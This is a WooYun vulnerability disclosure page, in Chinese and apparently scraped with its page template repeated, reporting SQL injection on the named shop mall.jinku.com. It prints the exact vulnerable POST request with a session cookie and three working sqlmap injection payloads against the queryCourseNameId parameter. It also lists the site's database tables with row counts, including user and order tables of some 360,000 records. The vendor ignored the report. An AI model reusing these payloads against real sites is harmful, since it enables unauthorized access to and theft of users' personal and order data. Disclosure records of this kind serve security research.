金库网某站存在SQL注入漏洞（36万用户信息和37万订单）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154149

漏洞标题：金库网某站存在SQL注入漏洞（36万用户信息和37万订单）

漏洞作者：路人甲

提交时间：2015-11-19 10:00

修复时间：2015-11-25 09:00

公开时间：2015-11-25 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-19：细节已通知厂商并且等待厂商处理中
2015-11-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

POST /goods/goodsType!toSearchGoodsNew.jspx?type=1 HTTP/1.1
Content-Length: 582
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION_COOKIE=11; JSESSIONID=5463DEDEE11F6ACF8EC7BAA20FBE0ECD
Host: mall.jinku.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
isShowOwn=&pageNo=1&queryCourseNameId=1111&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: queryCourseNameId (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT 3373 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3373=3373,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('zxfn'='zxfn&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT * FROM (SELECT(SLEEP(5)))bAQF) AND ('ADUy'='ADUy&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') UNION ALL SELECT CONCAT(0x71787a7671,0x746257727a4872624e53,0x716a707071)#&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
---
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: cabbage
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| sys_web_logger                 | 3141103 |
| study_detail                   | 2282992 |
| study_record                   | 1940376 |
| finance_con_record             | 1894992 |
| finance_con_record_bak         | 1884583 |
| study_sco_7                    | 949760  |
| study_sco_5                    | 939103  |
| study_sco_1                    | 937822  |
| study_sco_2                    | 937277  |
| study_sco_6                    | 936209  |
| study_sco_4                    | 935783  |
| study_sco_9                    | 935736  |
| study_sco_3                    | 935592  |
| study_sco_8                    | 934908  |
| study_sco                      | 931137  |
| study_sco_bak_1                | 679724  |
| study_sco_bak                  | 554562  |
| chapter_record                 | 395504  |
| v_finance_send_ticket          | 395157  |
| finance_order                  | 377426  |         //订单
| useraccounts                   | 362998  |
| userinfo                       | 362997  |        //用户
| users                          | 362997  |         //用户
| testpaper_topic                | 254843  |
| finance_recharge               | 202852  |
| finance_send_ticket            | 192305  |
| study_detail_app               | 148818  |
| junkustudyrecord_temp          | 128228  |
| usersecures                    | 126264  |
| usermedals                     | 122509  |
| shoppinggood                   | 90965   |
| testpaper_report               | 90909   |
| finance_send_ticket_detail     | 74242   |
| qz_testpaper_topic             | 63428   |
| finance_invoice                | 53104   |
| shoppingcart                   | 36709   |
| userfive                       | 29145   |
| collects                       | 25999   |
| new_testpaper_topic            | 24660   |
| evaluate                       | 19346   |
| newoptions                     | 18810   |
| testpaper_topic_bak            | 14907   |
| new_testpaper_report           | 14819   |
| qz_testpaper_report            | 14771   |
| shoppingparm                   | 11411   |
| testpaper_report_bak           | 6967    |
| sys_web_phone_mes_request_info | 6583    |
| newproblem                     | 5028    |
| shopping_protocol              | 3737    |
| spike_log                      | 3472    |
| new_testpaper_report_font      | 2900    |
| options                        | 2792    |
| testpaper                      | 1950    |
| new_testpaper                  | 1773    |
| testpaper_report_font          | 1673    |
| finance_user_record            | 1353    |
| newuserfive                    | 1170    |
| sys_se_role_r_fr               | 1121    |
| course_item_credit             | 1087    |
| cards                          | 711     |
| org_buy_cards                  | 705     |
| problem                        | 699     |
| l_uo_organization              | 616     |
| qz_testpaper                   | 558     |
| item_file                      | 433     |
| discount                       | 419     |
| goods_courseware               | 413     |
| study_sco_log                  | 390     |
| book                           | 381     |
| goods_course                   | 372     |
| qz_testpaper_report_font       | 351     |
| tgglv_cfp                      | 320     |
| course                         | 286     |
| goods                          | 286     |
| courseflash                    | 265     |
| goods_files                    | 265     |
| announce                       | 244     |
| sys_operation_log              | 229     |
| goods_praise                   | 225     |
| qy_testpaper_topic             | 199     |
| tgglv                          | 181     |
| stages_newproblem              | 172     |
| friend_invite                  | 156     |
| flush_cache                    | 154     |
| problembox                     | 150     |
| xingjipm                       | 141     |
| org_discount                   | 139     |
| sys_se_function_resource       | 134     |
| spikeinfo                      | 111     |
| testpaper_bak                  | 108     |
| finance_refund_approval        | 102     |
| testpaper_report_font_bak      | 98      |
| finance_approval_study         | 76      |
| tags                           | 71      |
| exam_counseling                | 64      |
| modular_course                 | 59      |
| sys_se_user_r_role             | 54      |
| sys_se_user                    | 53      |
| sys_se_user_r_group            | 53      |
| vipprice                       | 52      |
| sys_se_role                    | 47      |
| sys_se_group_role              | 43      |
| finance_apply_study            | 38      |
| sys_web_phone_mes_request_lump | 36      |
| typebox_goods                  | 36      |
| advertis                       | 35      |
| finance_refund                 | 33      |
| companyuser                    | 24      |
| coursetutor                    | 21      |
| qy_testpaper                   | 19      |
| modular                        | 13      |
| typebox                        | 13      |
| spikemachineinfo               | 12      |
| sys_se_group                   | 12      |
| goodstype                      | 11      |
| items                          | 6       |
| l_uo_org_type                  | 6       |
| solution                       | 6       |
| machine_info                   | 5       |
| examtest                       | 4       |
| heat_sell                      | 4       |
| seckillprice                   | 4       |
| other_phone                    | 3       |
| site_activity                  | 3       |
| company                        | 2       |
| infoleft                       | 2       |
| stages                         | 2       |
| sys_message                    | 2       |
| user_msg                       | 2       |
| sysrefund                      | 1       |
| typebox_companyusers           | 1       |
+--------------------------------+---------+

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-11-25 09:00

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154149

漏洞标题：金库网某站存在SQL注入漏洞（36万用户信息和37万订单）

相关厂商：jinku.com

漏洞作者：路人甲

提交时间：2015-11-19 10:00

修复时间：2015-11-25 09:00

公开时间：2015-11-25 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154149

漏洞标题：金库网某站存在SQL注入漏洞（36万用户信息和37万订单）

相关厂商：jinku.com

漏洞作者： 路人甲

提交时间：2015-11-19 10:00

修复时间：2015-11-25 09:00

公开时间：2015-11-25 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154149"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云